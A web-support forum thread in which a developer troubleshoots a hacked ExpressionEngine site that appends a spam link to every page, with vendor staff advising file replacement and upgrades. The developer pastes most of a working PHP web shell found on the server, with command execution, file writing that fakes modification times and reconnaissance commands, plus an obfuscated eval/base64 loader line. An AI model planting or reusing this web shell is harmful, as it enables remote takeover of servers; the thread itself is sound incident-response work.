Thread

Hey guys,

A client recently contacted us saying that there are now links at the bottom of everypage on their EE site.

It looks like some code is appending a link after the closing html tag like this:

</body> 
</html><a href="http://minibikegames.com">bike games</a>

- All template files are clean, the link is not inside of any template
- I’ve searched the database and can’t find the link anywhere there
- i’ve done a search using grep for minibikegames, bike, games, etc with no results
- I’ve checked the .htaccess file, but nothing has been added.

Upon further inspection, I found some old template files that looked like they had been infected with a virus perhaps.  They were labeled like this - index.php.infected.  Inside was some encrypted php:

<?php $o = '7Vptc9s2Ev4c/QqE44nIVKb5Jl….

I’m wondering if some php code could have been executed and possibly added something to a php config file, or another server file that is still there appending a link to all of my pages.

If I visit an .html file, the link does not appear, neither does the link appear in the source of the EE control panel.  It only appears inside of EE generated pages, which leads me to believe that something has modified a core EE file. 

Does anyone have any ideas or input that would help me further investigate this issue?

Thanks!
Jon

Hi, Jon,

Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

1. EE version and build (found at the bottom of your control panel)
2. Other scripts on your account, whether in use or not (phpBB, etc…)*

* If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

While we work through this, please check through these files:

* path.php
* config.php
* index.php

to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

You may also wish to refresh your files by following the build update instructions.

Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

Hi Lisa,
Thanks for the quick reply.

The site is running EE 1.6.4 Build:  20080710 (old, i know)
EE is currently the only system installed, and the only database that exists.

It’s hosted on Rackspace as a cloud site.

I’ve checked all three of those files and nothing seems to be out of place, but I’ll post here just to make sure:

path.php

<?php

// ------------------------------------------------------
// DO NOT ALTER THIS FILE UNLESS YOU HAVE A REASON TO

// ------------------------------------------------------
// Path to the directory containing your backend files

$system_path = "./admin/";

// ------------------------------------------------------
// MANUALLY CONFIGURABLE VARIABLES
// See user guide for more information
// ------------------------------------------------------

$template_group = "";
$template = "";
$site_url = "";
$site_index = "";
$site_404 = "";
$global_vars = array(); // This array must be associative

?>

config.php

<?php

if ( ! defined('EXT')){
exit('Invalid file request');
}

$conf['app_version'] = "164";
$conf['license_number'] = "xxxxxx";
$conf['debug'] = "1";
$conf['install_lock'] = "1";
$conf['db_hostname'] = "xxxxxx";
$conf['db_username'] = "xxxxxx";
$conf['db_password'] = "xxxxxx";
$conf['db_name'] = "xxxxxx";
$conf['db_type'] = "mysql";
$conf['db_prefix'] = "exp";
$conf['db_conntype'] = "0";
$conf['system_folder'] = "admin";
$conf['cp_url'] = "http://www.sitename.com/admin/";
$conf['doc_url'] = "http://expressionengine.com/docs/";
$conf['cookie_prefix'] = "";
$conf['is_system_on'] = "y";
$conf['allow_extensions'] = "y";
$conf['multiple_sites_enabled'] = "n";
$conf['user_module_key_expiration'] = "30";
$conf['user_email_is_username'] = "y";
$conf['user_screen_name_override'] = "first-name|last-name";
$conf['user_category_group'] = "2";
?>

I’m currently in the process of getting permission to update to the latest version of EE, and will let you know as soon as I’m able to.  I’ll also notify the host and see if we can find anything out from that end.

It’s also worth noting that rackspace cloud sites don’t have ssh access, so I’m unable to make any changes through that route.

Are you saving templates as files?

I’d also make sure you do a whole file replacement; I’d bet that that line is in some file somewhere, and replacing those files gives you a clean slate.

But it’s most important that we find the point of entry.  Let us know what the host says, they’re most able to assess that.

thanks Jon!

Templates are not being saved as files, but they may have been at some point since all of the template files were in the system/templates directory. This is also where all of the template_name.php.infected files were located.

I’ll be in touch soon when I find out more.

Just heard back from Rackspace and they did a search for the offending link but couldn’t find anything referring to that or any other malicious files on the server side.  They also checked file permissions, but said everything looked good on that end too. 

Seems like an outdated EE install may have been the culprit, but I still can’t find where this link is being generated from!

I don’t know if this is related, but in my searching I found an odd htaccess.php file in the images directory.

Tried attaching the file as a txt file, but can’t.  Posting the first bit of code below:

<?php
if(isset($_GET['lilo'])) {
clearstatcache();
set_magic_quotes_runtime(0);
if(!function_exists('ini_set')){
function ini_set(){
return FALSE;
}
}
ini_set('output_buffering',0);
if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited';
else $limit = get_cfg_var('max_execution_time');

if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}

if(@get_magic_quotes_gpc()){
foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v);
}

function execute($c){
if(function_exists('exec')){
@exec($c, $out);
return @implode("\n", $out);
}elseif(function_exists('shell_exec')){
$out = @shell_exec($c);
return $out;
}elseif(function_exists('system')){
@ob_start();
@system($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}elseif(function_exists('passthru')){
@ob_start();
@passthru($c, $ret);
$out = @ob_get_contents();
@ob_end_clean();
return $out;
}else{
return FALSE;
}
}

function read($f){
$str = @file($f);
if($str){
$out = implode('', $str);
}elseif(function_exists('curl_version')){
@ob_start();
$h = @curl_init('file:/'.'/'.$f);
@curl_exec($h);
$out = @ob_get_contents();
@ob_end_clean();
}else{
$out = 'Could not read file!';
}
return htmlspecialchars($out);
}

function write($f, $c){
$t = filemtime($f);
$fp = @fopen($f, 'w');
if($fp){
fwrite($fp, $c);
fclose($fp);
$out = 'File saved.'."\n";
if($t && touch($f, $t)){
$out .= 'Last modification time changed.';
}else{
$out .= 'Could not change last modification time!';
}
}else{
$out = 'Saving failed!';
}
return $out;
}

function file_size($f){
$size = filesize($f);
if($size < 1024) $size = $size.' b';
elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb';
elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb';
return $size;
}

if(!function_exists('natcasesort')){
function natcasesort($arr){
return sort($arr);
}
}

if(!empty($_POST['dir'])){
$dir = $_POST['dir'];
if(!@chdir($dir)) $out = 'chdir() failled!';
}
$dir = getcwd();



(strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix';

if(!$os_name = @php_uname()){
if(function_exists('posix_uname')){
$os_name = posix_uname();
}elseif($os_name != getenv('OS')){
$os_name = '';
}
}

if(function_exists('posix_getpwuid')){
$data = posix_getpwuid(posix_getuid());
$user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')';
}else{
$user = '';
}

$safe_mode = get_cfg_var('safe_mode');
$safe_mode ? $safe = 'on' : $safe = 'off';

execute('echo ssps') ? $execute = 'on' : $execute = 'off';




$server = getenv('SERVER_SOFTWARE');
if(!$server) $server = '---';



$out = '';
$tail = '';
$aliases = '';
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}
}

Apologies for the info overload, but figured this might be worth it too.

Below is the last segment of the infected php files:

eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B");

Not sure how to decode it, but I’m wondering if this still exists elsewhere on the site.

Yes, it’s fairly common, these days, for hackers to encode the links; that’s why I am encouraging you to do a wholesale file replacement (and manually look at the few files you need to keep, such as path.php and config.php).

Rackspace should be able to find the point of entry, though.  Any updates on that part of the investigation?

Thanks Jon!

The host maintains that there’s nothing wrong on their end, and that nothing suspicious turned up when they checked out the account, they also said this issue is not supported anymore :(

Unfortunately, the client doesn’t want us to investigate this issue further as they’re about to release a new site (not created by us), so I won’t be able to provide much more troubleshooting :(

If there’s anything else I can easily do that will help you out, just let me know.

Thanks again for your help,
Jon

Hi Jon,

The best advice I can give is to do a version update to EE 1.7.1, since as you know 1.6.4 is pretty ancient and there have certainly been security updates since then.

It sounds like troubleshooting further with the client is futile, but don’t hesitate to start a new thread if anything else crops up. Thanks for bringing this to our attention!